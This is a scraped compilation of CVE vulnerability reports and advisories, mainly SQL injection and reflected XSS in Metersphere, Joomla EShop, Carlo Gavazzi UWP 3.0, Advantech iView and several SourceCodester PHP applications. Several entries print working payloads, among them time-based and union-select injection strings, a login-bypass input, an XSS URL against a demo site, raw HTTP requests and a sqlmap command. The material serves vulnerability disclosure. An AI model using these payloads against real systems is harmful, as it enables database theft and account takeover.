Time-based SQL Injection vulnerabilities were found in Metersphere v1.15.4 via the "orders" parameter.

**Version**

v1.15.4

**Description**

Authenticated users can control the parameters in the "order by" statement, which causing SQL injection.

API: /test/case/list/{goPage}/{pageSize}

Vulnerable source code:  
ExtTestPlanTestCaseMapper.xml

        <select id="list" resultType="io.metersphere.track.dto.TestPlanCaseDTO">
            select test_plan_test_case.id as id, test_case.id as caseId, test_case.name, test_case.priority,
            test_case.type,test_case.test_id as testId,test_case.node_id, test_case.tags, test_case.maintainer,
            test_case.custom_fields,
            test_case.node_path, test_case.method, if(project.custom_num = 0, cast(test_case.num as char),
            test_case.custom_num) as customNum, test_plan_test_case.executor, test_plan_test_case.status,
            test_plan_test_case.actual_result,
            test_plan_test_case.update_time, test_plan_test_case.create_time,test_case_node.name as model, project.name as
            projectName,test_plan_test_case.issues as issues,test_plan_test_case.issues_count as issuesCount,
            test_plan_test_case.plan_id as planId
            from test_plan_test_case
            inner join test_case on test_plan_test_case.case_id = test_case.id
            left join test_case_node on test_case_node.id = test_case.node_id
            inner join project on project.id = test_case.project_id
            <include refid="queryWhereCondition"/>
            <if test="request.orders != null and request.orders.size() > 0">
                order by
                <foreach collection="request.orders" separator="," item="order">
                    <choose>
                        <when test="order.name == 'custom_num'">
                         customNum ${order.type}
                        </when>
                         <when test="order.name == 'name'">
                            test_case.name ${order.type}
                         </when>
                        <otherwise>
                            test_plan_test_case.${order.name} ${order.type}
                        </otherwise>
                    </choose>
                </foreach>
            </if>
        </select>
    

TestPlanTestCaseService.java

        public List<TestPlanCaseDTO> list(QueryTestPlanCaseRequest request) {
            request.setOrders(ServiceUtils.getDefaultSortOrder(request.getOrders()));
            List<TestPlanCaseDTO> list = extTestPlanTestCaseMapper.list(request);
            QueryMemberRequest queryMemberRequest = new QueryMemberRequest();
            queryMemberRequest.setProjectId(request.getProjectId());
            Map<String, String> userMap = userService.getProjectMemberList(queryMemberRequest)
                    .stream().collect(Collectors.toMap(User::getId, User::getName));
            list.forEach(item -> {
                item.setExecutorName(userMap.get(item.getExecutor()));
                item.setMaintainerName(userMap.get(item.getMaintainer()));
            });
            return list;
        }
    
    

**To Reproduce**

I have tested this vulnerability on the demo website https://demo.metersphere.com/.  
Set the value of the "orders" parameter

    "orders":[{"name":"name","type":",if(1=1,sleep(2),0)"}]
    

As we have seen, this lead to time-based sqli

  
  
Some other APIs also have sqli，such as

    /test/plan/case/list/all
    /test/plan/case/list/ids
    /issues/list/{goPage}/{pageSize}
    /test/case/list/{goPage}/{pageSize}

CVE-2021-45788: [BUG]Time-based SQL Injetion in v1.15.4 · Issue #8651 · metersphere/metersphere

EShop Joomla Shopping-Cart extension version 3.6.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : Ossolution Team                                                            ││  Software : EShop Joomla Shopping-Cart 3.6.0 - Reflected XSS                           ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘GET parameter 'change_filter' is vulnerable to XSSPath: /eshop/filter.html?change_filter=[XSS]https://joomdonationdemo.com/eshop/filter.html?change_filter=d1a5x"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"wklcp[-] Done

EShop Joomla Shopping-Cart 3.6.0 Cross Site Scripting

In Carlo Gavazzi UWP3.0 in multiple versions and CPY Car Park Server in Version 2.8.3 the Sentilo Proxy is prone to reflected XSS which only affects the Sentilo service.

2022-09-26 10:00 (CEST) VDE-2022-029  

**Carlo Gavazzi Controls: Multiple Vulnerabilities in Controller UWP 3.0**  
Share: Email | Twitter  

**

Published

**

2022-09-26 10:00 (CEST)

**

Last update

**

2022-09-26 12:00 (CEST)

**Vendor(s)**

Carlo Gavazzi Controls SpA  

**Product(s)**

Article No°

Product Name

Affected Version(s)

SBP2CPY24

CPY Car Park Server

< 2.8.3

UWP30RSEXXX

UWP 3.0 Monitoring Gateway and Controller

< 8.5.0.3

UWP30RSEXXXEDP

UWP 3.0 Monitoring Gateway and Controller – EDP version

< 8.5.0.3

UWP30RSEXXXSE

UWP 3.0 Monitoring Gateway and Controller – Security Enhanced

< 8.5.0.3

**

Summary

**

The UWP 3.0 family of Monitoring Gateways and Controllers and the CPY Car Park Server are affected by multiple vulnerabilities in their set-up software, runtime firmware, embedded Web interface.

**

Vulnerabilities

**

**Weakness**

Use of Hard-coded Credentials (CWE-798)

**Summary**

_In Carlo Gavazzi UWP3.0 in multiple versions and CPY Car Park Server in multiple versions a remote, unauthenticated attacker could make use of hard-coded credentials to gain full access to ..._

**Summary**

_In Carlo Gavazzi UWP3.0 in multiple versions and CPY Car Park Server in multiple versions an unauthenticated remote attacker could utilize a SQL-Injection vulnerability to gain full database access, modify ..._

**Weakness**

Missing Authentication for Critical Function (CWE-306)

**Summary**

_In Carlo Gavazzi UWP3.0 in multiple versions and CPY Car Park Server in multiple versions a missing authentication allows for full access via API._

**Weakness**

Improper Input Validation (CWE-20)

**Summary**

_In Carlo Gavazzi UWP3.0 in multiple versions and CPY Car Park Server in multiple versions a remote, unauthenticated attacker could utilize an improper input validation on an API-submitted parameter to ..._

**Weakness**

Use of Hard-coded Credentials (CWE-798)

**Summary**

_In Carlo Gavazzi UWP3.0 in multiple versions and CPY Car Park Server in multiple versions a remote, unauthenticated attacker could make use of hard-coded credentials to gain SuperUser access to ..._

**Summary**

_In Carlo Gavazzi UWP3.0 in multiple versions and CPY Car Park Server in multiple versions was discovered to be vulnerable to a relative path traversal vulnerability which enables remote attackers ..._

**Summary**

_In Carlo Gavazzi UWP3.0 in multiple versions the Sentilo Proxy is prone to reflected XSS which only affects the Sentilo service._

**Summary**

_An improper authentication vulnerability exists in the Carlo Gavazzi UWP3.0 in multiple versions and CPY Car Park Server in multiple versions Web-App which allows an authentication bypass to the context of ..._

**Summary**

_In Carlo Gavazzi UWP3.0 in multiple versions and CPY Car Park Server in multiple versions a remote, unauthenticated attacker could make use of an SQL-injection to gain access to a ..._

**Weakness**

Improper Input Validation (CWE-20)

**Summary**

_In Carlo Gavazzi UWP3.0 in multiple versions and CPY Car Park Server in multiple versions an remote attacker with admin rights could execute arbitrary commands due to missing input sanitization ..._

**Summary**

_In Carlo Gavazzi UWP3.0 in multiple versions the Sentilo Proxy server was discovered to contain a SQL injection vulnerability allowing an attacker to query other tables of the Sentilo service._

**

Impact

**

An attacker can get full access to the affected devices. See the vulnerability descriptions for details.

**

Solution

**

**General recommendations**

*   Use controllers and devices only in a protected environment to minimize network exposure and ensure that they are not accessible from outside
*   Use firewalls to protect and separate the control system network from other networks
*   Use VPN (Virtual Private Networks) tunnels if remote access is required
*   Activate and apply user management and password features
*   Use encrypted communication links
*   Limit the access to both set-up and control system by physical means, operating system features, etc.
*   Protect the set-up and control system by using up to date virus detecting solutions

**Remediation**

Please update to software/firmware versions as described below:

**Article Nr.**

**Product Name and Description**

**Fixed in version**

UWP30RSEXXX

UWP 3.0 Monitoring Gateway and Controller

\>= 8.5.0.3  
available from April 27th,2022

UWP30RSEXXXSE

UWP 3.0 Monitoring Gateway and Controller – Security  
Enhanced

UWP30RSEXXXEDP

UWP 3.0 Monitoring Gateway and Controller – EDP version

SBP2CPY24

CPY Car Park Server

\>= 2.8.3  
available from June 28th,2022

**

Reported by

**

Carlo Gavazzi thanks the following parties for their efforts:

*   CERT@VDE for coordination and support with this publication
*   Vera Mens from Claroty Research for reporting to CERT@VDE

CVE-2022-28816: VDE-2022-029 | CERT@VDE

A vulnerability classified as critical has been found in SourceCodester Food Ordering Management System. This affects an unknown part of the file router.php of the component POST Parameter Handler. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-209583.

Sorry, something went wrong. Reload?

Sorry, we cannot display this file.

Sorry, this file is invalid so it cannot be displayed.

CVE-2022-3332: vuls/Food Ordering Management System router.php SQL Injection.pdf at main · vuls/vuls

SQL Injection vulnerability exists in version 1.0 of the Resumes Management and Job Application Website application login form by EGavilan Media that allows authentication bypass through login.php.

**Authentication Bypass in "Resumes Management and Job Application Website" application by EGavilan Media**

*   Vendor Homepage: https://egavilanmedia.com/resumes-management-and-job-application-website/
*   Github: https://github.com/EGavilan-Media/Resumes-Management-and-Job-Application-Website-with-PHP-Bootstrap-and-MySQL
*   Version 1.0
*   CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41433

SQL Injection vulnerability exists in the **Resumes Management and Job Application Website** application login form by EGavilan Media that allows Authentication Bypass.

> SQL Injection attack consists of inserting an SQL query through the input data from the client into the application. Upon successful misuse, it is possible to retrieve detailed data from the database, edit database data such as inserting, updating or deleting data, work with administrative operations in the database, or in some situations run commands directly on the operating system.

**Steps to reproduce**

1.  Download, install and run **Resumes Management and Job Application Website** application.
2.  Visit the following resource localhost/login.html.
3.  Enter the below mentioned credentials in the vulnerable field:

*   username: admin'-- -
*   password: _anything_

5.  Press the **Login** button, this will result in a successful Authentication Bypass.

**Remediation**

*   Use of Prepared Statements (with Parameterized Queries)
*   Use of Stored Procedures
*   Allow-list Input Validation
*   Escaping All User Supplied Input

Discovered by Martin Kubecka, September 15, 2021.

CVE-2021-41433: CVE-References/CVE-2021-41433.md at main · martinkubecka/CVE-References

An SQL injection vulnerability in Advantech iView 5.7.04.6469. The specific flaw exists within the ConfigurationServlet endpoint, which listens on TCP port 8080 by default. An unauthenticated remote attacker can craft a special column_value parameter in the setConfiguration action to bypass checks in com.imc.iview.utils.CUtils.checkSQLInjection() to perform SQL injection. For example, the attacker can exploit the vulnerability to retrieve the iView admin password.

_All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability._

_Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order._

_For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page._

_If you have questions or corrections about this advisory, please email \[email protected\]_

Tenable Advisory ID

TRA-2022-32

CVSSv3 Base / Temporal Score

CVSSv3 Vector

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Affected Products

Advantech iView 5.7.04.6469

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable.io Vulnerability Management trial also includes Tenable Lumin, Tenable.io Web Application Scanning and Tenable.cs Cloud Security.

 BUY

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

65 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable.io. A representative will be in touch soon.

**Try Nessus Professional Free**

FREE FOR 7 DAYS

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

**Buy Nessus Professional**

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable.io Vulnerability Management trial also includes Tenable Lumin, Tenable.io Web Application Scanning and Tenable.cs Cloud Security.

Tenable.io

BUY

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

65 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable.io. A representative will be in touch soon.

**Try Tenable.io Web Application Scanning**

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable.io platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. **Sign up now.**

Your Tenable Web Application Scanning trial also includes Tenable.io Vulnerability Management, Tenable Lumin and Tenable.cs Cloud Security.

**Buy Tenable.io Web Application Scanning**

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

**Try Tenable.io Container Security**

Enjoy full access to the only container security offering integrated into a vulnerability management platform. Monitor container images for vulnerabilities, malware and policy violations. Integrate with continuous integration and continuous deployment (CI/CD) systems to support DevOps practices, strengthen security and support enterprise policy compliance.

**Buy Tenable.io Container Security**

Tenable.io Container Security seamlessly and securely enables DevOps processes by providing visibility into the security of container images – including vulnerabilities, malware and policy violations – through integration with the build process.

**Thank You**

Thank you for your interest in the Tenable.io Container Security program. A representative will be in touch soon.

**Try Tenable Lumin**

Visualize and explore your Cyber Exposure, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable.io Vulnerability Management, Tenable.io Web Application Scanning and Tenable.cs Cloud Security.

**Buy Tenable Lumin**

Contact a Sales Representative to see how Lumin can help you gain insight across your entire organization and manage cyber risk.

**Thank You**

Thank you for your interest in Tenable Lumin. A representative will be in touch soon.

**Request a demo of Tenable.sc**

Please fill out this form with your contact information.

A sales representative will contact you shortly to schedule a demo.

_\* Field is required_

**Request a demo of Tenable.ot**

Get the Operational Technology Security You Need.

Reduce the Risk You Don’t.

**Thank You**

Thank you for your interest in Tenable.ot. A representative will be in touch soon.

**Request a demo of Tenable.ad**

Continuously detect and respond to Active Directory attacks. No agents. No privileges.

On-prem and in the cloud.

**Try Tenable.cs**

Enjoy full access to detect and fix cloud infrastructure misconfigurations and view runtime vulnerabilities. Sign up for your free trial now.

Your Tenable.cs Cloud Security trial also includes Tenable.io Vulnerability Management, Tenable Lumin and Tenable.io Web Application Scanning.

**Contact a Sales Rep to Buy Tenable.cs**

Contact a Sales Representative to learn more about Tenable.cs Cloud Security and see how easy it is to onboard your cloud accounts and get visibility into both cloud misconfigurations and vulnerabilities within minutes.

**Thank You**

Thank you for your interest in Tenable.cs. A representative will be in touch soon.

**See Tenable.ep In Action**

Know the exposure of every asset on any platform.

**See Tenable.asm In Action**

Know the exposure of every asset on any platform.

**Thank You**

Thank you for your interest in Tenable.asm. A representative will be in touch soon.

**Try Nessus Expert Free**

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

**Already have Nessus Professional?**  
Upgrade to Nessus Expert free for 7 days.

**Buy Nessus Expert**

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

CVE-2022-3323: Advantech iView ConfigurationServlet setConfiguration SQL Injection

Online Tours & Travels Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/update_booking.php.

**Online Tours & Travels management system v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Bains

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /tour/admin/update\_booking.php

Vulnerability location: /tour/admin/update\_booking.php?id=, id

dbname = tour1

\[+\] Payload: /tour/admin/update\_booking.php?id=-1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13--+ // Leak place ---> id

GET /tour/admin/update\_booking.php?id\=\-1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=g29omi7f91g3h7ud1uhq6rbmkv
Connection: close

CVE-2022-40354: Bug_report/SQLi-3.md at main · songbingxue/Bug_report

Exam Reviewer Management System 1.0 is vulnerable to SQL Injection via the ‘id’ parameter.

    # Exploit Title: Exam Reviewer Management System 1.0 - ‘id’ SQL Injection
    # Date: 2022-02-18
    # Exploit Author:  Juli Agarwal(@agarwaljuli)
    # Vendor Homepage:
    https://www.sourcecodester.com/php/15160/simple-exam-reviewer-management-system-phpoop-free-source-code.html
    
    # Software Link:
    https://www.sourcecodester.com/download-code?nid=15160&title=Simple+Exam+Reviewer+Management+System+in+PHP%2FOOP+Free+Source+Code
    
    # Version: 1.0
    # Tested on: Windows 10/Kali Linux
    
    
    
    Description – The ‘id’ parameter in Exam Reviewer Management System web
    application is vulnerable to SQL Injection
    
    Vulnerable URL - http://127.0.0.1/erms/?p=take_exam&id=1
    
    
    
    POC:-
    
    
    
    ---
    
    Parameter: id (GET)
    
    Type: boolean-based blind
    
    Title: AND boolean-based blind - WHERE or HAVING clause
    
    Payload: p=take_exam&id=1' AND 4755=4755 AND 'VHNu'='VHNu
    
    
    
    Type: error-based
    
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY
    clause (FLOOR)
    
    Payload: p=take_exam&id=1' OR (SELECT 8795 FROM(SELECT
    COUNT(*),CONCAT(0x71766a7071,(SELECT
    (ELT(8795=8795,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM
    INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'MCXA'='MCXA
    
    
    
    Type: time-based blind
    
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    
    Payload: p=take_exam&id=1' AND (SELECT 2206 FROM (SELECT(SLEEP(5)))AhEo)
    AND 'vqGg'='vqGg---
    
    
    
    *SQLMAP COMMAND*
    
    
    
    *# sqlmap -u "127.0.0.1/erms/?p=take_exam&id=1
    <http://127.0.0.1/erms/?p=take_exam&id=1>" -p id --dbs --level 3*

CVE-2022-40877: Offensive Security’s Exploit Database Archive

Online Tours & Travels Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/up_booking.php.

**Online Tours & Travels management system v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Bains

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /tour/admin/up\_booking.php

Vulnerability location: /tour/admin/up\_booking.php?id=, id

dbname = tour1

\[+\] Payload: /tour/admin/up\_booking.php?id=-1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13--+ // Leak place ---> id

GET /tour/admin/up\_booking.php?id\=\-1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=g29omi7f91g3h7ud1uhq6rbmkv
Connection: close

CVE-2022-40353: Bug_report/SQLi-2.md at main · songbingxue/Bug_report

Online Tours & Travels Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/update_traveller.php.

**Online Tours & Travels management system v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Bains

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /tour/admin/update\_traveller.php

Vulnerability location: /tour/admin/update\_traveller.php?id=, id

dbname = tour1

\[+\] Payload: /tour/admin/update\_traveller.php?id=-1%27%20union%20select%201,database(),3,4,5,6,7,8,9,10--+ // Leak place ---> id

GET /tour/admin/update\_traveller.php?id\=\-1%27%20union%20select%201,database(),3,4,5,6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=g29omi7f91g3h7ud1uhq6rbmkv
Connection: close

Tag

#sql